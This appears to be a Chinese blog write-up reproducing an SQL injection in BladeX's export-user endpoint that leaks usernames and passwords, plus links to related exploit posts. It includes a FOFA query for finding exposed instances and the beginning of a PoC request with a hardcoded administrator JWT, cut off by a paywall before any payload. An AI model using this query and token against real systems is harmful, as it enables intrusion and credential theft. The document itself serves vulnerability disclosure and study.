BladeX企业级开发平台 export-user SQL 注入漏洞复现

0xSecl

已于 2024-08-28 11:05:01 修改

阅读量1.9k

点赞数 10

分类专栏：漏洞复现v1 文章标签： sql 数据库 web安全

于 2023-12-19 14:03:18 首次发布

本文链接：https://blog.youkuaiyun.com/qq_41904294/article/details/135083018

版权

漏洞复现v1 专栏收录该内容

997 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文详细介绍了SpringBlade v3.2.0及其以前版本的一个安全漏洞，该漏洞允许攻击者通过export-user路径利用customSqlSegment进行SQL注入，可能导致用户敏感信息泄露。复现环境中发现该问题，厂商已发布修复程序，建议用户及时更新并采取防火墙策略限制访问。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

0x01 产品简介

BladeX是一款精心设计的微服务架构，提供 SpringCloud 全套解决方案，开源中国首批完美集成 SpringCloud Alibaba 系列组件的微服务架构，基于稳定生产的商业项目升级优化而来，更加贴近企业级的需求，追求企业开发更加高效。

0x02 漏洞概述

BladeX企业级开发平台 export-user 路径存在安全漏洞，攻击者利用该漏洞可通过组件customSqlSegment 进行SQL注入攻击，攻击者可将用户名、密码等敏感信息通过 excel 导出。

0x03 复现环境

FOFA：body="https://bladex.vip"

0x04 漏洞复现

PoC

GET /api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMj

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

10
点赞
踩
13

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

【漏洞复现】SpringBlade export-user接口SQL注入漏洞

李火火的安全圈

01-22

1654

SpringBlade 是一个由商业级项目升级优化而来的微服务架构采用Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建，完全遵循阿里巴巴编码规范。提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。

SpringBlade export-user SQL 注入漏洞

holyxp的博客

01-10

1246

SpringBlade 是一个由商业级项目升级优化而来的 SprinaCloud 分布式微服务架构、Springoot 单体式微服务架构并存的综合型项四。SpringBlade v3.2.0 及之前版本框架后台 export-user 路径存在安全漏洞Q，攻击者利用该漏洞可通过组件customSalSegment 进行SQL注入攻击，攻击者可将用户名、密码等敏感信息通过 excel 导出。

参与评论您还未登录，请先登录后发表或查看评论

BladeX企业级开发平台 error/list SQL 注入漏洞复现

0xSec

03-12

1539

BladeX企业级开发平台 /api/blade-log/error/list路径存在SQL注入漏洞，攻击者除了可以利用SQL注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

BladeX企业级开发平台 dict-biz/list SQL 注入漏洞复现

0xSec

04-16

1882

BladeX企业级开发平台/api/blade-system/dict-biz/list 路径存在SQL注入漏洞，攻击者除了可以利用SQL注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

【漏洞复现】SpringBlade export-user接口存在SQL注入漏洞

失心少年

02-05

911

SpringBlade 是一个由商业级项目升级优化而来的微服务架构采用Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建，完全遵循阿里巴巴编码规范。技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！

【漏洞复现】（1day）Bladex快速开发平台sql注入漏洞

weixin_56297026的博客

12-20

1592

fofa语法：body="https://bladex.vip/"

【漏洞复现】SpringBlade error_list SQL 注入漏洞

https://blog.echo234.cn/

03-26

875

SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpringBoot 单体式微服务架构并存的综合型项目。框架后台/api/blade-log/error/list路径存在安全漏洞，攻击者利用该漏洞进行SQL注入攻击。

vulhub复现记录

书山有路勤为径，学海无涯苦作舟

10-16

1988

看作者下面的解释可以知道，自 2022 年 2 月起，作为 Docker Compose V2023 的子命令合并到 Docker 中，Python 版本的将在年月之后弃用。但是由于我之前在CentOS搭建了老的docker,所以就继续使用，老的docker-compose.其中遇到不少坑，就浅浅的记录一下吧。

Goby 漏洞发布｜网神SecGate 3600防火墙 sys_export_conf_local_save 文件读取漏洞_网神secssl安全接入网关3600 user add action

2401_84300128的博客

05-04

822

网神SecGate 3600防火墙是基于状态检测包过滤和应用级代理的复合型硬件防火墙，是专门面向大中型企业、政府、军队、高校等用户开发的新一代专业防火墙设备，支持外部攻击防范、内网安全、网络访问权限控制、网络流量监控和带宽管理、动态路由、网页内容过滤、邮件内容过滤、IP冲突检测等功能，能够有效地保证网络的安全；在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。

漏洞复现-SpringBlade export-user SQL 注入漏洞（附漏洞检测脚本）

jjjj1029056414的博客

01-21

1228

漏洞复现-SpringBlade export-user SQL 注入漏洞，附带自己写的poc脚本

【SpringBlade-权限缺陷】API鉴权逻辑缺陷漏洞

06-29

7794

【API鉴权】

转载：SpringBlade框架JWT认证缺陷漏洞CVE-2021-44910